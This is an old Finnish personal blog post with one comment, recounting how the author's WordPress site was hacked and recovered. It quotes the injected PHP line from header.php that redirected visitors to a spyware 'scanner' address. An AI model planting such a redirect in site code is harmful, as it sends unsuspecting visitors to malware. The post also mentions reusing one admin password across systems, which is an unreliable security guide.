Malware attack

Kirjoittanut . Liittyy aiheisiin , , , , , , , .

Arkistomatskua

Otathan huomioon, että tämä on yli 12 vuotta vanha artikkeli, joten sisältö ei ole välttämättä ihan ajan tasalla. Olin artikkelin kirjoittamishetkellä 20-vuotias.

Tänä aamuna tajusin että rollemaa.fiin WP oli mystisesti mutatoitunut eilisiltapäivästä. Sivu oli täynnä virheilmoituksia ja header.php:n ensimmäinen rivi sisälsi seuraavan pätkän (älä mene tuohon osoitteeseen, se sisältää spywarea):

<?

header(”Location: http://scanner.malwarealarms.com/5/?advid=2241”);

?>

Admin-tunnukset oli ryöstetty ja sähköpostiosoite muutettu lol@lol.ru -osoitteeksi. Menin phpMyAdminiin ja pengoin wp_usersin alta adminin ja vaihdoin sähköpostiosoitteen, jolloin sain salasanan vaihdettua. Myönnän että adminsalasanani oli aivan liian helppo, alkuajoilla keksitty. Nyt se on 14-kirjaiminen (sama kuin työadminkoneeni salasana, isoja ja pieniä kirjaimia ja numeroita sekaisin, muistan sen hyvin).

Liekö sitten kyseessä nykyisen WordPressin haavoittuvaisuus vai salasanan helppous… voisinpa tämän rohkaisemana päivittää WP:ni uusimpaan. Ilkeää.

Kuva Roni Laukkarisesta

Roni Laukkarinen

Kirjoittaja on 31-vuotias elämäntapanörtti, ammatiltaan yrittäjä ja teknologiajohtaja perustamassaan digitoimistossa, verkkosivujen tekijä, koukussa kirjoittamiseen 5-vuotiaasta. Päivät kuluu monipuolisen musiikkiharrastuksen, retropelien ja koodaamisen parissa, mutta arkea piristyttää myös vaimo ja kaksi lasta. Twitter, leffat ja erikoisoluet lähellä sydäntä.

Lue Rollesta lisää

Reaktiot

Vaadittu kenttä

 

2 kommenttia

  1. Gocom

    Ouh :( Voihan olla mahdollista että palvelinkin on hakkeroitu, mutta toisaalta kuulostaa enemmän taas noilta konffi-exploit-scripteiltä.

    No eihän WP ole niin hirveän turvallinen softa kuitenkaan, jos mietitään että jopa script kiddiet pääsee sivuston kaatamaan ”hetkessä” hakuammulta scripteillään.

    Mutta onhan muissakin blogisoftissa omat aukkonsa.

    Kuinka monta merkkiä oli alkuperäisessä salasanassa? Jos haluamme nussia pilkkua voimme laskea sen muodostamisen maksimiajan ;)